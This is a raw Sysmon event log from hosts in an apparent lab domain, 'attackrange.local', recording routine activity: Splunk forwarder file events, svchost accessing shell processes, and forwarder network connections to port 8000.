19:17:53.555{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606017Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:53.555{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C7DFCBA745DD7BC4DEE4C2898FCAEE5,SHA256=008DD4107E1ADDD721C9D545C8D42A6FC4EC7B9A57B407FECABD116A8FC94791falsefalse - insufficient disk space 10341000x80000000000000001094997Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:53.486{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001094996Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
19:17:53.486{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095001Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:54.866{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F482ECB3BCA75DDBA99F40E55EEDEBE8,SHA256=984A6BF29DCF2A8920BBFE5B746558131215CD7546D9E30E1A7BECFD42E2F920,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001606025Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:52.736{21761711-8431-607D-C500-00000000BB01}3840C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-5.attackrange.local49725-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 11241100x80000000000000001606024Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:54.573{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606023Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
19:17:54.573{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD614B053B905256DF5C5231A07DBC74,SHA256=C55B1AEEE40E1DCA786D2CD61FFA15AA15BC526344717EC4345B68101C711438falsefalse - insufficient disk space 10341000x80000000000000001095000Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:54.487{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001094999Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:54.487{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001606022Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
19:17:54.326{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001606021Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:54.326{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EC19776DBBFBEFBB7462F264E840555F,SHA256=4C6E1C0BE8DE741E501D674008AE53269F107398233C10BA7FF9C09FAD7D82BFfalsefalse - insufficient disk space 11241100x80000000000000001606020Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:54.326{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001606019Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:54.326{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=04A571D93215048A0C0817A02C760FC5,SHA256=49F3FA4BCABB170092CE7B8F8DA4641FA1293A0D44A0531748D74E417490FA7Dfalsefalse - insufficient disk space 23542300x80000000000000001095004Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:55.868{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8457217EDAF3075B8F0D7AD63EC845F3,SHA256=A459A7A5891A7341F7607C26A971EA29705051C44B51E89E26D65611165D5144,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001606030Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:55.644{21761711-83AD-607D-0C00-00000000BB01}7245356C:\Windows\system32\svchost.exe{21761711-83AE-607D-1500-00000000BB01}1100C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606029Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
19:17:55.644{21761711-83AD-607D-0C00-00000000BB01}7245356C:\Windows\system32\svchost.exe{21761711-83AE-607D-1500-00000000BB01}1100C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606028Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:55.644{21761711-83AD-607D-0C00-00000000BB01}7245356C:\Windows\system32\svchost.exe{21761711-83AE-607D-1500-00000000BB01}1100C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001606027Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:55.575{21761711-8437-607D-CE00-00000000BB01}2032C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606026Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:55.575{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F39F42985207D35D96F837014FEA1BE,SHA256=CAC87A84A57A6BCAB6A3758804B1513B5C5695A34FBBDEC722E5C69AE0F4555Afalsefalse - insufficient disk space 10341000x80000000000000001095003Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:55.488{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095002Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
19:17:55.488{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095007Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:56.870{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=007BF601F1CF9FE5CCA3A1475F4CB281,SHA256=7F59BB226CD04396B14FE0555A62EF02D249DBE17429C1F5043F410493A5BEEE,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001606032Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:56.594{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606031Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:56.594{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=99C05147812FA536F4493482CA5DCE6D,SHA256=190316E3E8A5D8A4981550C30AA0DC124149E66632E4AD9D1719D878EBDFE3D2falsefalse - insufficient disk space 
10341000x80000000000000001095006Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:56.488{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095005Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:56.488{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095013Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:57.877{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=76962B9B3D0E401276AC0783049622A3,SHA256=3BC130B26DEFEB223043822EC917C3DDDF6F3228AF406A1EA272E4E60BD0D6C8,IMPHASH=00000000000000000000000000000000falsetrue 
11241100x80000000000000001606034Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:57.665{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606033Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:57.665{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5FDCC4FAFAA591C52BD9D36DC0B5A3FF,SHA256=A386A8A68F9509FB32609605539D3E53167E180961D62455ADD7AF8E7C36349Cfalsefalse - insufficient disk space 354300x80000000000000001095012Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:52.738{761B69BB-8207-607D-CF00-00000000BA01}4116C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-982.attackrange.local1141-false10.0.1.12-8000- 10341000x80000000000000001095011Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:57.488{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001095010Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:57.488{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095009Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:57.191{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=991BBADCB91968A3B3C85363605EC044,SHA256=213BAC42A49CC6E7324FE50CA83DFB9D037A0B44A3BB67960D5822CA75568424,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001095008Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:57.190{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B69CFC5E8A04AB91CC8B2EEFC852DFC9,SHA256=35423A014A478DD525555B1194E0C858EC5CAA95BD6D4A1C90DB7C4433A3BF4E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001095016Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:58.881{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=072F33218BFF7EA7C56A64508D6F60A1,SHA256=8AC848BEAE3A24C07B0D288F494D69ABC19E3A15C6FB439A0498223E400C8C56,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001606036Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:58.667{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606035Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:58.667{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D60EAA46DC1E49AED376FD4D8BA82475,SHA256=003330C69475C6F75360E3D4DFA9C066208FF63232E926492EFAA3E84E171A13falsefalse - insufficient disk space 10341000x80000000000000001095015Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:58.489{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095014Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
19:17:58.489{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001606038Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:59.839{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606037Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:59.839{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FBE468C88F74067E8053B53EEC0D032E,SHA256=FDF8700D3BD5142A32FA3AD598718CE5E807609BCFE1D0A629A8031024D2C79Dfalsefalse - insufficient disk space 23542300x80000000000000001095019Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:59.895{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7BFFAE5DB97DA22C50A53604A600AC0B,SHA256=EB2AC29643C33F959A87ACF74283EB2AEA4E7AF06EF108C904788D60ED4F7A63,IMPHASH=00000000000000000000000000000000falsetrue 
10341000x80000000000000001095018Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:59.490{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095017Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 